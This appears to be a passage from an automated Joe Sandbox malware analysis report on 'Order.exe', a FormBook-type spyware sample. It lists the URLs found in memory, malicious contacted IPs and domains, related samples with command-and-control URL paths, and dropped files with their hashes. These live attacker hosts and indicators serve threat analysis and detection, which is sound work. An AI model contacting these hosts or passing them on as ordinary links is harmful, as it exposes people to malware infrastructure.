                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.fontbureau.com/designersOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.goodfont.co.krOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.sajatypeworks.comOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.typography.netDOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.founder.com.cn/cn/cTheOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://www.amitayush.digital/5ab9/?kf-HBx=RKfYqv7dLSd52zuxxJ7Umshta.exe, 00000009.00000002.4144994745.000000000578E000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000003E7E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.galapagosdesign.com/staff/dennis.htmOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://www.tukaari.shopmkvfHfXifKJWp.exe, 0000000C.00000002.4145802850.0000000004AB8000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.galapagosdesign.com/DPleaseOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.fonts.comOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.sandoll.co.krOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.urwpp.deDPleaseOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.zhongyicts.com.cnOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOrder.exe, 00000000.00000002.1737474491.0000000002A31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.sakkal.comOrder.exe, 00000000.00000002.1755072561.0000000005324000.00000004.00000020.00020000.00000000.sdmp, Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://www.fontbureau.comOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icomshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://www.strikingly.com/?utm_source=404&utm_medium=internal&utm_campaign=404_redirectfirefox.exe, 0000000D.00000002.2206128704.000000000D164000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://www.ecosia.org/newtab/mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://www.carterandcone.comlOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://www.tmstore.click/qmcg/?kf-HBx=67IAuCDTBw5QZph7iUnsNNZg0vqYuCAKYaPJ7pOH3jPtJouGJ8FPmshta.exe, 00000009.00000002.4144994745.0000000004E22000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000003512000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://ac.ecosia.org/autocomplete?q=mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.founder.com.cn/cnOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.fontbureau.com/designers/frere-user.htmlOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.jiyu-kobo.co.jp/Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.fontbureau.com/designers8Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown

                                                                                                                                  World Map of Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public IPs

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  217.160.0.231
                                                                                                                                  		www.coffee-and-blends.infoGermany
                                                                                                                                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                  52.20.84.62
                                                                                                                                  		www.luxe.guruUnited States
                                                                                                                                  		14618AMAZON-AESUStrue
                                                                                                                                  35.156.117.131
                                                                                                                                  		www.specialgift.asia.s.strikinglydns.comUnited States
                                                                                                                                  		16509AMAZON-02UStrue
                                                                                                                                  156.226.22.233
                                                                                                                                  		www.nad5.shopSeychelles
                                                                                                                                  		132813AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHKtrue
                                                                                                                                  206.119.82.134
                                                                                                                                  		40wxd.topUnited States
                                                                                                                                  		174COGENT-174UStrue
                                                                                                                                  54.179.173.60
                                                                                                                                  		dns.ladipage.comUnited States
                                                                                                                                  		16509AMAZON-02UStrue
                                                                                                                                  142.250.186.83
                                                                                                                                  		ghs.googlehosted.comUnited States
                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                  162.213.249.216
                                                                                                                                  		www.vasehub.xyzUnited States
                                                                                                                                  		22612NAMECHEAP-NETUStrue
                                                                                                                                  3.33.130.190
                                                                                                                                  		softillery.infoUnited States
                                                                                                                                  		8987AMAZONEXPANSIONGBtrue
                                                                                                                                  172.81.61.224
                                                                                                                                  		www.moritynomxd.xyzUnited States
                                                                                                                                  		22552ESITEDUStrue

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                  Analysis ID:1540817
                                                                                                                                  Start date and time:2024-10-24 08:00:06 +02:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 11m 51s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:13
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:2
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:Order.exe
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@14/7@16/10
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 75%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 93%
                                                                                                                                  • Number of executed functions: 96
                                                                                                                                  • Number of non-executed functions: 289
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                  Warnings

                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  02:01:03API Interceptor2x Sleep call for process: Order.exe modified
                                                                                                                                  02:01:04API Interceptor18x Sleep call for process: powershell.exe modified
                                                                                                                                  02:01:57API Interceptor12176771x Sleep call for process: mshta.exe modified

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  217.160.0.231NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.coffee-and-blends.info/fhdl/
                                                                                                                                  PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.coffee-and-blends.info/bhth/
                                                                                                                                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.coffee-and-blends.info/bhth/
                                                                                                                                  52.20.84.62http://fortcollinsfineart.com/Get hashmaliciousUnknownBrowse
                                                                                                                                  • fortcollinsfineart.com/
                                                                                                                                  T9W7MCS2HI.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.luxe.guru/s9un/
                                                                                                                                  UPDATED Q-LOT24038.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.luxe.guru/s9un/
                                                                                                                                  PO S-TECHAccolle654657659768774876980.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  • www.rezzla.com/n5i5/
                                                                                                                                  gRDcPJpgMQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.comicdesk.xyz/fs83/?F0G=4hOdKx&AZ=uIYpFveLu/CBw7DmAO/Ti/dUlBfSx1al2FMqfKekdnKV/Pg8KM0G546XOuFlZTdYS3bk
                                                                                                                                  UAyH98ukuA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.comicdesk.xyz/fs83/?K6kd=uIYpFveLu/CBw7DmAO/Ti/dUlBfSx1al2FMqfKekdnKV/Pg8KM0G546XOuJlKDRbLnbyZHKrPA==&uTrL=_bj8lfEpU
                                                                                                                                  Moderatestes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  • www.unbiasedresearch.org/gu1b/
                                                                                                                                  Scsi.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  • www.unbiasedresearch.org/gu1b/
                                                                                                                                  Axoplasm.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  • www.unbiasedresearch.org/gu1b/
                                                                                                                                  QZUOO6hU1V.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  • www.unbiasedresearch.org/gu1b/
                                                                                                                                  35.156.117.131jeez.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.specialgift.asia/5x7s/
                                                                                                                                  http://www.unityonesecurlty.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                  • www.unityonesecurlty.com/
                                                                                                                                  payment copy.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.desradicalize.com/fa0s/?rp-XJd=yaiD4CrQBqQk3f6bY8AcjSFvE0d0FeRyEQO7Tb7KR4+cspDv2ZhT1e5uTwRJ5I3i91xDLw==&X2Jd-=a0D0YRy8U2Gt
                                                                                                                                  s8b4XYptUi.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.pushaoeel-kouhu-bunan7266.com/m07f/?_H=x2d5fJPkcmwjJQD8/aoiU8RP+XDANfw3Yy1Dy/UxKWzII5azeJQ7Z0gd+jhTqVNgTfno&qPzl7=-Zo4sR
                                                                                                                                  bm6sl8vbG7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.ddshop.online/benx/?uVY=CpIPBPe0Fzl4eL8&G8ahUZ=DxfSjoAnqGLwaGS8X0xeKLmgb9UiOHyg6lv1L2gURlVw/mIxU5OP2fq4M2A1SurxVLKy
                                                                                                                                  invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jinlan.online/e3rs/?uFQl=XP7HMT_8&w0G=0ZKu2HAGzvZQR/qsYgBhCWXzZU+pty94akjoW6oXtCN964+Lsvy2TInFlM7SmRuoaV8X

                                                                                                                                  Domains

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  www.specialgift.asia.s.strikinglydns.comjeez.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 35.156.117.131
                                                                                                                                  www.moritynomxd.xyzPOPO00003964.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 172.81.61.224
                                                                                                                                  YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 172.81.61.224
                                                                                                                                  Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 172.81.61.224
                                                                                                                                  List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  • 172.81.61.224
                                                                                                                                  PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 172.81.61.224
                                                                                                                                  ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 172.81.61.224

                                                                                                                                  ASNs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  AMAZON-AESUSla.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.208.56.119
                                                                                                                                  la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 35.172.39.248
                                                                                                                                  na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.93.94.203
                                                                                                                                  https://linkednnn.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 3.233.158.25
                                                                                                                                  la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.217.150.18
                                                                                                                                  https://freshremovedigital.com/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 18.232.36.66
                                                                                                                                  https://forcallblitz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 34.225.61.248
                                                                                                                                  https://www.paypal.com/invoice/payerView/details/INV2-N92X-T2Z2-AHQ9-TKQH?locale.x=en_US&v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000238&utm_unptid=3863e735-915a-11ef-98e8-79ac3b3090e7&ppid=RT000238&cnac=US&rsta=en_US%28en-US%29&unptid=3863e735-915a-11ef-98e8-79ac3b3090e7&calc=f264059569334&unp_tpcid=invoice-buyer-notification&page=main%3Aemail%3ART000238&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.287.1&tenant_name=&xt=145585%2C134644%2C150948%2C104038&link_ref=details_inv2-n92x-t2z2-ahq9-tkqhGet hashmaliciousUnknownBrowse
                                                                                                                                  • 54.235.101.7
                                                                                                                                  https://printwithwave.co:443,*Get hashmaliciousUnknownBrowse
                                                                                                                                  • 54.225.120.177
                                                                                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 54.18.237.108
                                                                                                                                  ONEANDONE-ASBrauerstrasse48DEAdeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  • 213.165.67.102
                                                                                                                                  https://talentrecruting.com/?Y3w2MDkxNzZ8d190cmF1MTEwRHx8fA0KfHxicnlhbi50LmJlYmJAc2FpYy5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                  • 74.208.140.2
                                                                                                                                  PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                                                                                  • 62.151.179.85
                                                                                                                                  LlbpXphTu9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 217.160.0.132
                                                                                                                                  derstand.docGet hashmaliciousUnknownBrowse
                                                                                                                                  • 62.151.179.85
                                                                                                                                  feelnicewithgreatthingsgreatdayscomingforgreat.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                  • 62.151.179.85
                                                                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 212.227.7.107
                                                                                                                                  Sprawl.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  • 213.165.67.102
                                                                                                                                  Rundholterne89.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  • 213.165.67.118
                                                                                                                                  Invoice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                  • 217.160.0.158
                                                                                                                                  AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 156.226.22.233
                                                                                                                                  notificacion_de_credito__PDF__.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 156.226.22.233
                                                                                                                                  RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 156.226.22.233
                                                                                                                                  INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 156.226.22.233
                                                                                                                                  September Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 156.226.22.233
                                                                                                                                  Tomcat.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 216.250.106.146
                                                                                                                                  b4cbf3ffbd8e152116e72487c3b16f1d.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 216.250.106.146
                                                                                                                                  Tomcat.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 216.250.106.146
                                                                                                                                  b4cbf3ffbd8e152116e72487c3b16f1d.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 216.250.106.146
                                                                                                                                  jURI57sJ9G.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                                                                                  • 154.211.23.99
                                                                                                                                  AMAZON-02USYIztve8dU8.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 34.249.145.219
                                                                                                                                  la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 18.247.128.153
                                                                                                                                  la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 44.226.164.168
                                                                                                                                  la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 13.117.90.175
                                                                                                                                  la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 18.221.130.130
                                                                                                                                  la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 35.73.66.55
                                                                                                                                  na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 35.181.167.123
                                                                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.202.44.93
                                                                                                                                  Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 13.248.169.48
                                                                                                                                  https://linkednnn.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 13.33.219.205

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  No context

                                                                                                                                  Dropped Files

                                                                                                                                  No context

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order.exe.log

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\Order.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1216
                                                                                                                                  Entropy (8bit):5.34331486778365
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                  Malicious:true
                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2232
                                                                                                                                  Entropy (8bit):5.379736180876081
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeoPUyus:tLHyIFKL3IZ2KRH9OugYs
                                                                                                                                  MD5:10E0B87B6111C866FC3B823731B377C7
                                                                                                                                  SHA1:B646EB7AF6029026F543BD48696E70F6551AA62B
                                                                                                                                  SHA-256:B8FF8B3EB3D58E1CFA8BE5364CCAE333151F10B33CD4252E99D5165A6BE5B160
                                                                                                                                  SHA-512:C42EA2C6876D6BC067CC2556597E4475E584D83BF0187EBE1D41645F481D6C4725C3BF65E4D6BAA5BDA076E2702BCE9DBE74ECF8B8D3C0A219D50A84F8AB6DAA
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                  C:\Users\user\AppData\Local\Temp\1863I7301

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):114688
                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ojejimv.xok.ps1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n4vk50nh.uc5.psm1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
